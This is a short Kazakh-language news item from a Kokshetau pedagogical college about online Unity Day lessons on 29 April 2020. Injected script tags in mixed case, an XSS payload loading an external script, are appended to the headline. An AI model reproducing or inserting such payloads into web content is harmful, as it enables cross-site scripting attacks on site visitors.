Қазақстан бірлігі күніне орай онлайн сабақтар өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.04.2020

Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің Тәрбие бөлімі тарапынан ұйымдастырылған іс-шаралар жоспарына сәйкес Бастауыш мектеп, Информатика бөлімінің топ жетекшілері «Бірлік пен келісім» тақырыбында қашықтықтан тәрбие сағаттарын өткізді.
29 сәуір күні БМ-21 тобының жетекшісі Жұматаева Шынар Елемесқызы студенттерге «Ынтымағы жарасқан, туған елім – Қазақстан» атты бейне сабағын жолдады. «Құрмет», «Сүйіспеншілік», «Достық», «Ынтымақ» құндылықтарының маңызын түсіндіру, халықтар арасындағы достықты нығайту, Қазақстанның өркендеуіне достық арқылы өз үлестерін қосуға баулу мақсатында қашықтықтан өткізілген тәрбие сағатына студенттер де белсене қатысты.

#бір шаңырақ астында

https://www.facebook.com/permalink.php?story_fbid=920431481748477&id=100013449011434&notif_id=1588154769448094&notif_t=feedback_reaction_generic

Просмотров: 560


Пікір қосу



Деректерді қолтаңбаға қосу